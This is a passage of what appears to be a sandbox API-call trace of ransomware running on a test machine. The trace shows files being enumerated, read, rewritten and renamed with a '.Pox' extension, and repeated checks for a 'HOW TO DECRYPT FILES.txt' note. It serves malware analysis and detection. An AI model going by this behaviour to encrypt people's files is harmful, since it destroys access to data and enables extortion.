nFileSizeHigh=0x0, nFileSizeLow=0x17b30)) returned 1 [0037.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0037.965] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t9zghii-\\62ixfu5vpwwkjk9yrto.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t9zghii-\\62ixfu5vpwwkjk9yrto.avi.pox")) returned 1 [0037.965] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx", lpFilePart=0x0) returned 0x47 [0037.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0037.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t9zghii-\\qumyxxz yiqpnxh4shd.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.965] GetFileType (hFile=0x26c) returned 0x1 [0037.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0037.965] GetFileType (hFile=0x26c) returned 0x1 [0037.965] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x56c1 [0037.965] ReadFile (in: hFile=0x26c, lpBuffer=0x24e5cac, nNumberOfBytesToRead=0x56c1, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x24e5cac*, lpNumberOfBytesRead=0x3ae4fc*=0x56c1, lpOverlapped=0x0) returned 1 [0037.966] CloseHandle (hObject=0x26c) returned 1 [0037.981] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0037.981] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0037.981] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx", lpFilePart=0x0) returned 0x47 [0037.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0037.981] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t9zghii-\\qumyxxz yiqpnxh4shd.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.985] GetFileType (hFile=0x26c) returned 0x1 [0037.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0037.985] GetFileType (hFile=0x26c) returned 0x1 [0037.985] WriteFile (in: hFile=0x26c, lpBuffer=0x254dca8*, nNumberOfBytesToWrite=0x56d0, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x254dca8*, lpNumberOfBytesWritten=0x3ae4f0*=0x56d0, lpOverlapped=0x0) returned 1 [0037.986] CloseHandle (hObject=0x26c) returned 1 [0037.987] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx", lpFilePart=0x0) returned 0x47 [0037.987] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx.Pox", lpFilePart=0x0) returned 0x4b [0037.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0037.988] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t9zghii-\\qumyxxz yiqpnxh4shd.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a4f4c10, ftCreationTime.dwHighDateTime=0x1d4d00a, ftLastAccessTime.dwLowDateTime=0x6af891f0, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0x28d28400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x56d0)) returned 1 [0037.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0037.988] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t9zghii-\\qumyxxz yiqpnxh4shd.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\qumyxXz YiQpNxh4shD.xlsx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t9zghii-\\qumyxxz yiqpnxh4shd.xlsx.pox")) returned 1 [0037.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0037.989] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44", lpFilePart=0x0) returned 0x2e [0037.989] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\", lpFilePart=0x0) returned 0x2f [0037.989] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x613dbfe0, ftLastAccessTime.dwHighDateTime=0x1d4ca9d, ftLastWriteTime.dwLowDateTime=0x613dbfe0, ftLastWriteTime.dwHighDateTime=0x1d4ca9d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405d88 [0037.989] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x613dbfe0, ftLastAccessTime.dwHighDateTime=0x1d4ca9d, ftLastWriteTime.dwLowDateTime=0x613dbfe0, ftLastWriteTime.dwHighDateTime=0x1d4ca9d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0037.990] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3aa6920, ftCreationTime.dwHighDateTime=0x1d4c739, ftLastAccessTime.dwLowDateTime=0xbc163300, ftLastAccessTime.dwHighDateTime=0x1d4c874, ftLastWriteTime.dwLowDateTime=0xbc163300, ftLastWriteTime.dwHighDateTime=0x1d4c874, nFileSizeHigh=0x0, nFileSizeLow=0xa81a, dwReserved0=0x0, dwReserved1=0x0, cFileName="0b1kQACiak6.ots", cAlternateFileName="0B1KQA~1.OTS")) returned 1 [0037.990] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba30340, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0xdcfd3420, ftLastAccessTime.dwHighDateTime=0x1d4d174, ftLastWriteTime.dwLowDateTime=0xdcfd3420, ftLastWriteTime.dwHighDateTime=0x1d4d174, nFileSizeHigh=0x0, nFileSizeLow=0x1ddd, dwReserved0=0x0, dwReserved1=0x0, cFileName="afnTu.mkv", cAlternateFileName="")) returned 1 [0037.990] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816b2d0, ftCreationTime.dwHighDateTime=0x1d4c55e, ftLastAccessTime.dwLowDateTime=0xb50f35e0, ftLastAccessTime.dwHighDateTime=0x1d4d295, ftLastWriteTime.dwLowDateTime=0xb50f35e0, ftLastWriteTime.dwHighDateTime=0x1d4d295, nFileSizeHigh=0x0, nFileSizeLow=0x16cc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="GXNTB.jpg", cAlternateFileName="")) returned 1 [0037.990] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a13870, ftCreationTime.dwHighDateTime=0x1d4ceef, ftLastAccessTime.dwLowDateTime=0xc23210, ftLastAccessTime.dwHighDateTime=0x1d4c915, ftLastWriteTime.dwLowDateTime=0xc23210, ftLastWriteTime.dwHighDateTime=0x1d4c915, nFileSizeHigh=0x0, nFileSizeLow=0x18e88, dwReserved0=0x0, dwReserved1=0x0, cFileName="kHfLoG p4e5.pdf", cAlternateFileName="KHFLOG~1.PDF")) returned 1 [0037.990] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d417a0, ftCreationTime.dwHighDateTime=0x1d4c676, ftLastAccessTime.dwLowDateTime=0x2a3f27c0, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0x2a3f27c0, ftLastWriteTime.dwHighDateTime=0x1d4d247, nFileSizeHigh=0x0, nFileSizeLow=0x152f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="pKpIeF7B-b-a.csv", cAlternateFileName="PKPIEF~1.CSV")) returned 1 [0037.991] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0037.991] FindClose (in: hFindFile=0x405d88 | out: hFindFile=0x405d88) returned 1 [0037.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0037.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0037.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0037.991] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44", lpFilePart=0x0) returned 0x2e [0037.991] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\", lpFilePart=0x0) returned 0x2f [0037.991] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x613dbfe0, ftLastAccessTime.dwHighDateTime=0x1d4ca9d, ftLastWriteTime.dwLowDateTime=0x613dbfe0, ftLastWriteTime.dwHighDateTime=0x1d4ca9d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405d88 [0037.991] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x613dbfe0, ftLastAccessTime.dwHighDateTime=0x1d4ca9d, ftLastWriteTime.dwLowDateTime=0x613dbfe0, ftLastWriteTime.dwHighDateTime=0x1d4ca9d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0037.991] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3aa6920, ftCreationTime.dwHighDateTime=0x1d4c739, ftLastAccessTime.dwLowDateTime=0xbc163300, ftLastAccessTime.dwHighDateTime=0x1d4c874, ftLastWriteTime.dwLowDateTime=0xbc163300, ftLastWriteTime.dwHighDateTime=0x1d4c874, nFileSizeHigh=0x0, nFileSizeLow=0xa81a, dwReserved0=0x0, dwReserved1=0x0, cFileName="0b1kQACiak6.ots", cAlternateFileName="0B1KQA~1.OTS")) returned 1 [0037.992] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba30340, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0xdcfd3420, ftLastAccessTime.dwHighDateTime=0x1d4d174, ftLastWriteTime.dwLowDateTime=0xdcfd3420, ftLastWriteTime.dwHighDateTime=0x1d4d174, nFileSizeHigh=0x0, nFileSizeLow=0x1ddd, dwReserved0=0x0, dwReserved1=0x0, cFileName="afnTu.mkv", cAlternateFileName="")) returned 1 [0037.992] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816b2d0, ftCreationTime.dwHighDateTime=0x1d4c55e, ftLastAccessTime.dwLowDateTime=0xb50f35e0, ftLastAccessTime.dwHighDateTime=0x1d4d295, ftLastWriteTime.dwLowDateTime=0xb50f35e0, ftLastWriteTime.dwHighDateTime=0x1d4d295, nFileSizeHigh=0x0, nFileSizeLow=0x16cc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="GXNTB.jpg", cAlternateFileName="")) returned 1 [0037.992] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a13870, ftCreationTime.dwHighDateTime=0x1d4ceef, ftLastAccessTime.dwLowDateTime=0xc23210, ftLastAccessTime.dwHighDateTime=0x1d4c915, ftLastWriteTime.dwLowDateTime=0xc23210, ftLastWriteTime.dwHighDateTime=0x1d4c915, nFileSizeHigh=0x0, nFileSizeLow=0x18e88, dwReserved0=0x0, dwReserved1=0x0, cFileName="kHfLoG p4e5.pdf", cAlternateFileName="KHFLOG~1.PDF")) returned 1 [0037.992] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d417a0, ftCreationTime.dwHighDateTime=0x1d4c676, ftLastAccessTime.dwLowDateTime=0x2a3f27c0, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0x2a3f27c0, ftLastWriteTime.dwHighDateTime=0x1d4d247, nFileSizeHigh=0x0, nFileSizeLow=0x152f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="pKpIeF7B-b-a.csv", cAlternateFileName="PKPIEF~1.CSV")) returned 1 [0037.992] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d417a0, ftCreationTime.dwHighDateTime=0x1d4c676, ftLastAccessTime.dwLowDateTime=0x2a3f27c0, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0x2a3f27c0, ftLastWriteTime.dwHighDateTime=0x1d4d247, nFileSizeHigh=0x0, nFileSizeLow=0x152f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="pKpIeF7B-b-a.csv", cAlternateFileName="PKPIEF~1.CSV")) returned 0 [0037.992] FindClose (in: hFindFile=0x405d88 | out: hFindFile=0x405d88) returned 1 [0037.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0037.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0037.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv", lpFilePart=0x0) returned 0x38 [0037.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0037.993] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\afntu.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.993] GetFileType (hFile=0x26c) returned 0x1 [0037.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0037.993] GetFileType (hFile=0x26c) returned 0x1 [0037.993] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x1ddd [0037.993] ReadFile (in: hFile=0x26c, lpBuffer=0x2555a74, nNumberOfBytesToRead=0x1ddd, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x2555a74*, lpNumberOfBytesRead=0x3ae4fc*=0x1ddd, lpOverlapped=0x0) returned 1 [0037.994] CloseHandle (hObject=0x26c) returned 1 [0038.009] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0038.009] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0038.010] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv", lpFilePart=0x0) returned 0x38 [0038.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0038.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\afntu.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.011] GetFileType (hFile=0x26c) returned 0x1 [0038.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0038.011] GetFileType (hFile=0x26c) returned 0x1 [0038.011] WriteFile (in: hFile=0x26c, lpBuffer=0x25abdc0*, nNumberOfBytesToWrite=0x1de0, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x25abdc0*, lpNumberOfBytesWritten=0x3ae4f0*=0x1de0, lpOverlapped=0x0) returned 1 [0038.012] CloseHandle (hObject=0x26c) returned 1 [0038.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv", lpFilePart=0x0) returned 0x38 [0038.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv.Pox", lpFilePart=0x0) returned 0x3c [0038.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0038.013] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\afntu.mkv"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba30340, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0xdcfd3420, ftLastAccessTime.dwHighDateTime=0x1d4d174, ftLastWriteTime.dwLowDateTime=0x28d746c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x1de0)) returned 1 [0038.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0038.013] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\afntu.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\afnTu.mkv.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\afntu.mkv.pox")) returned 1 [0038.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg", lpFilePart=0x0) returned 0x38 [0038.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0038.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tQYzvy44\\GXNTB.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tqyzvy44\\gxntb.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.013] GetFileType (hFile=0x26c) returned 0x1 [0038.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0038.014] GetFileType (hFile=0x26c) returned 0x1 [0038.014] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x16cc3 [0038.014] ReadFile (in: hFile=0x26c, lpBuffer=0x35ec358, nNumberOfBytesToRead=0x16cc3, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x35ec358*, lpNumberOfBytesRead=0x3ae4fc*=0x16cc3, lpOverlapped=0x0) returned 1 [0038.016] CloseHandle (hObject=0x26c) returned 1 [0038.091] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0038.091] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, 